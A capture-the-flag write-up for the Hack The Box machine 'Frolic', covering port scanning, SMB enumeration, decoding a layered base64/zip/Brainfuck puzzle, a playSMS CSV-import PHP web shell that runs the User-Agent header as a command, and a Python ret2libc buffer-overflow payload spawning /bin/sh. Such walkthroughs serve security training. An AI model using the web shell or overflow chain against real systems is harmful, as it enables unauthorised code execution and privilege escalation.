HTB Frolic

Port Scan

# Nmap 7.93 scan initiated Thu Dec 15 09:06:29 2022 as: nmap -p- -A --min-rate 10000 -oN portscan.txt 10.10.10.111
Nmap scan report for 10.10.10.111
Host is up (0.26s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 877b912a0f11b6571ecb9f77cf35e221 (RSA)
|   256 b79b06ddc25e284478411e677d1eb762 (ECDSA)
|_  256 21cf166d82a430c3c69cd738bab502b0 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp open  http        Node.js (Express middleware)
|_http-title: Node-RED
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m58s, deviation: 3h10m30s, median: 0s
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2022-12-15T19:37:25+05:30
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-12-15T14:07:26
|_  start_date: N/A

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   254.76 ms 10.10.14.1
2   254.86 ms 10.10.10.111

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 15 09:07:34 2022 -- 1 IP address (1 host up) scanned in 64.79 seconds

SMB

smbmap and smbclient both show nothing interesting: two shares, neither with anonymous access:

[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.111...
[+] IP: 10.10.10.111:445        Name: 10.10.10.111
        Disk                                                    Permissions
        ----                                                    -----------
        print$                                                  NO ACCESS
        IPC$                                                    NO ACCESS

root@kali# smbclient -N -L //10.10.10.111

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (frolic server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            FROLIC

Node-Red - TCP 1880

Web content discovery

curl 10.10.10.111:9999/dev/backup/
/playsms

playsms

String decryption

admin


success.html

ook decryption

/asdiSIAJJ0QWE9JAS

curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAA

It looks like a zip file (note the PK signature at the start):

curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd
00000000: 504b 0304 1400 0900 0800 c389 374d 23fe  PK..........7M#.
00000010: 5b14 b000 0000 6902 0000 0900 1c00 696e  [.....i.......in
00000020: 6465 782e 7068 7055 5409 0003 857c a75b  dex.phpUT....|.[
00000030: 857c a75b 7578 0b00 0104 0000 0000 0400  .|.[ux..........
00000040: 0000 005e 44e6 104a 9f73 b268 8a29 9a1b  ...^D..J.s.h.)..
00000050: 9550 f06e 0ba9 bf53 73e4 024a 771a 11dc  .P.n...Ss..Jw...
00000060: 8ee5 a034 e2f6 d98f 6bee 7ad0 128a 55c8  ...4....k.z...U.
00000070: 96ec 2b58 ba7f e050 c8e1 12e1 b687 a4ea  ..+X...P........
00000080: d0bb e278 5f13 c04e 895b fd8d 8453 aaea  ...x_..N.[...S..
00000090: 38f2 83f2 e20f 914a 3253 c72a 8303 44d0  8......J2S.*..D.
000000a0: 8d7d 9338 6454 0e51 026b de10 cad7 e3e4  .}.8dT.Q.k......
000000b0: fb6a 5f9f 8bf9 18e9 94c0 2778 7f63 90c2  .j_.......'x.c..
000000c0: 16dd 8f74 beb2 3735 51ac 0b9a 8a03 0e95  ...t..75Q.......
000000d0: 106b 032c 34b5 d962 29be 3446 b5e9 0609  .k.,4..b).4F....
000000e0: ffba 84e3 96ea e9ef c726 7132 6f88 57d4  .........&q2o.W.
000000f0: 9ce3 3950 4b07 0823 fe5b 14b0 0000 0069  ..9PK..#.[.....i
00000100: 0200 0050 4b01 021e 0314 0009 0008 00c3  ...PK...........
00000110: 8937 4d23 fe5b 14b0 0000 0069 0200 0009  .7M#.[.....i....
00000120: 0018 0000 0000 0001 0000 00a4 8100 0000  ................
00000130: 0069 6e64 6578 2e70 6870 5554 0500 0385  .index.phpUT....
00000140: 7ca7 5b75 780b 0001 0400 0000 0004 0000  |.[ux...........
00000150: 0000 504b 0506 0000 0000 0100 0100 4f00  ..PK..........O.
00000160: 0000 0301 0000 0000                      ........
curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > index.php.zip

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt index.php.zip

password: password

index.php

cat index.php

Use xxd to convert the hex back to bytes; the result is not only ASCII but base64 characters:

cat index.php | xxd -r -p
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==

There are some \r\n in there that will screw up base64. I’ll remove them, and decode:

cat index.php | xxd -r -p | tr -d '\r\n' | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<
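As an added example (not part of the original writeup), the same decoding chain in Python: strip the line breaks, base64-decode, and interpret the resulting Brainfuck program. The embedded text is the base64 shown above, re-joined with \r\n to mirror what xxd -r -p produced.

```python
import base64

# Constructed from the `xxd -r -p` output above: base64 text wrapped with \r\n breaks.
HEX_DECODED_INDEX = (
    "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr\r\n"
    "KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg\r\n"
    "K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t\r\n"
    "LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==\r\n"
)

def strip_and_b64decode(text: str) -> str:
    """Same as `tr -d '\\r\\n' | base64 -d`: drop all whitespace, then decode."""
    return base64.b64decode("".join(text.split())).decode("ascii")

def run_brainfuck(program: str, max_steps: int = 1_000_000) -> str:
    """Minimal Brainfuck interpreter: 8-bit cells, no input, non-command characters
    ignored, and a step cap so a malformed or hostile program cannot spin forever."""
    code = [c for c in program if c in "+-<>[]."]
    jump, stack = {}, []
    for i, c in enumerate(code):  # pre-compute matching bracket positions
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unmatched ']'")
            jump[i] = stack.pop()
            jump[jump[i]] = i
    if stack:
        raise ValueError("unmatched '['")
    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    for _ in range(max_steps):
        if pc >= len(code):
            return "".join(out)
        c = code[pc]
        if c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif (c == "[") == (tape[ptr] == 0):  # '[' on zero or ']' on non-zero: jump
            pc = jump[pc]
        pc += 1
    raise RuntimeError("step limit exceeded")
```

Running `run_brainfuck(strip_and_b64decode(HEX_DECODED_INDEX))` reproduces the full chain and returns the string the Brainfuck program prints.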

www-data shell

Public vulnerability in playsms:
https://www.exploit-db.com/exploits/42044/

book.csv

Name,Mobile,Email,Group code,Tags
<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?>,2,,,

Priv escalation

Transfer the binary with nc

We can use gdb to inspect the binary, and I find the vulnerable function.
The buffer overflows if we input more than 0x30 characters.

Locate the offset

Check which libc version is on the machine; with it we can find the offsets of the functions we need.

# Python 3 (the original note was Python 2): build the 32-bit ret2libc chain.
import struct
import sys

offset = 52                               # padding up to the saved return address
elf_address = 0xb7e19000                  # libc base found on the target
system_addr = elf_address + 0x0003ada0    # system() offset in this libc version
exit_addr = elf_address + 0x0002e9d0      # exit() offset, so the process exits cleanly
str_bin_sh = elf_address + 0x15ba0b       # "/bin/sh" string offset in libc

# print('system_addr: ' + hex(system_addr))
# print('exit_addr: ' + hex(exit_addr))
# print('str_bin_sh: ' + hex(str_bin_sh))

# [padding][system][return address for system -> exit][argument -> "/bin/sh"]
payload = offset * b'A' + struct.pack('<I', system_addr) + struct.pack('<I', exit_addr) + struct.pack('<I', str_bin_sh)
sys.stdout.buffer.write(payload)          # raw bytes, no trailing newline, so `> payload` is exact

We can redirect the output to a file.

Upload the payload file and run the ROP chain with $(cat payload).